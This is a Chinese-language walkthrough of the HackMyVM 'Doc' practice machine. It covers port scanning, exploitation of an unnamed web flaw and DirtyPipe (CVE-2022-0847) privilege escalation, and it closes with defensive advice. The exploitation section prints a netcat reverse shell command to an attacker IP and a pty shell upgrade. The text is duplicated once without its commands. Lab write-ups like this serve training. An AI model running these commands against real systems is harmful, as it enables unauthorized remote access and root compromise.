hackmyvm系列12——doc
字数 941 2025-08-12 11:34:21

HackMyVM系列12——Doc靶场渗透测试报告

1. 靶场概述

本靶场名称为"Doc",属于HackMyVM系列的第12个靶机。这是一个基于Web应用的漏洞利用和权限提升练习环境,主要涉及信息收集、Web漏洞利用和Linux系统提权等技术点。

2. 信息收集阶段

2.1 初始扫描

使用Nmap进行全端口扫描:

nmap -sV -Pn -sC -A 192.168.56.185 -p 0-65535

关键参数说明:

  • -sV:服务版本检测
  • -Pn:跳过主机发现,直接扫描
  • -sC:使用默认脚本扫描
  • -A:全面扫描(OS检测、版本检测、脚本扫描和traceroute)

2.2 Web应用发现

访问主页后发现登录页面,从中发现一个域名:

doc.hmv

将域名添加到hosts文件:

vim /etc/hosts

添加内容:

192.168.56.185 doc.hmv

3. 漏洞利用阶段

3.1 历史漏洞搜索

通过搜索引擎查找该Web应用的历史漏洞,发现可利用的漏洞。

3.2 反弹Shell获取

使用发现的exp进行反弹shell操作:

nc -c sh 192.168.56.105 6666

获取稳定shell:

python3 -c "import pty;pty.spawn('/bin/bash');"

4. 权限提升阶段

4.1 上传检测脚本

上传提权检测脚本,识别可能的提权路径。

4.2 DirtyPipe漏洞利用

尝试使用CVE-2022-0847 (DirtyPipe)漏洞进行提权:

  1. 上传exp到目标系统
  2. 编译时遇到错误,原因是环境变量问题
  3. 修复环境变量:
export PATH=$PATH:/usr/bin/ld
  1. 重新编译并运行exp

5. 关键知识点总结

  1. 信息收集

    • 全端口扫描对于发现隐藏服务至关重要
    • 域名发现和hosts文件修改是Web测试常见操作
  2. 漏洞利用

    • 历史漏洞搜索是快速突破的有效方法
    • 反弹shell后获取稳定shell的技术(Python pty)
  3. 权限提升

    • 环境变量问题可能导致编译失败,需要灵活处理
    • DirtyPipe(CVE-2022-0847)是Linux内核提权漏洞
    • 上传和编译exp是常见提权手段

6. 防御建议

  1. 及时更新系统和应用补丁
  2. 限制不必要的网络服务暴露
  3. 监控系统异常进程和网络连接
  4. 实施最小权限原则
  5. 定期进行安全审计和漏洞扫描

7. 注意事项

  1. 本技术仅用于合法授权测试
  2. 实际渗透测试需获得书面授权
  3. 所有操作应在可控实验环境中进行
  4. 遵守当地法律法规

8. 扩展学习

  1. 深入研究DirtyPipe漏洞原理
  2. 学习其他Linux提权技术
  3. 掌握更多Web应用漏洞利用方法
  4. 练习自动化渗透测试工具使用
HackMyVM系列12——Doc靶场渗透测试报告 1. 靶场概述 本靶场名称为"Doc",属于HackMyVM系列的第12个靶机。这是一个基于Web应用的漏洞利用和权限提升练习环境,主要涉及信息收集、Web漏洞利用和Linux系统提权等技术点。 2. 信息收集阶段 2.1 初始扫描 使用Nmap进行全端口扫描: 关键参数说明: -sV :服务版本检测 -Pn :跳过主机发现,直接扫描 -sC :使用默认脚本扫描 -A :全面扫描(OS检测、版本检测、脚本扫描和traceroute) 2.2 Web应用发现 访问主页后发现登录页面,从中发现一个域名: 将域名添加到hosts文件: 添加内容: 3. 漏洞利用阶段 3.1 历史漏洞搜索 通过搜索引擎查找该Web应用的历史漏洞,发现可利用的漏洞。 3.2 反弹Shell获取 使用发现的exp进行反弹shell操作: 获取稳定shell: 4. 权限提升阶段 4.1 上传检测脚本 上传提权检测脚本,识别可能的提权路径。 4.2 DirtyPipe漏洞利用 尝试使用CVE-2022-0847 (DirtyPipe)漏洞进行提权: 上传exp到目标系统 编译时遇到错误,原因是环境变量问题 修复环境变量: 重新编译并运行exp 5. 关键知识点总结 信息收集 : 全端口扫描对于发现隐藏服务至关重要 域名发现和hosts文件修改是Web测试常见操作 漏洞利用 : 历史漏洞搜索是快速突破的有效方法 反弹shell后获取稳定shell的技术(Python pty) 权限提升 : 环境变量问题可能导致编译失败,需要灵活处理 DirtyPipe(CVE-2022-0847)是Linux内核提权漏洞 上传和编译exp是常见提权手段 6. 防御建议 及时更新系统和应用补丁 限制不必要的网络服务暴露 监控系统异常进程和网络连接 实施最小权限原则 定期进行安全审计和漏洞扫描 7. 注意事项 本技术仅用于合法授权测试 实际渗透测试需获得书面授权 所有操作应在可控实验环境中进行 遵守当地法律法规 8. 扩展学习 深入研究DirtyPipe漏洞原理 学习其他Linux提权技术 掌握更多Web应用漏洞利用方法 练习自动化渗透测试工具使用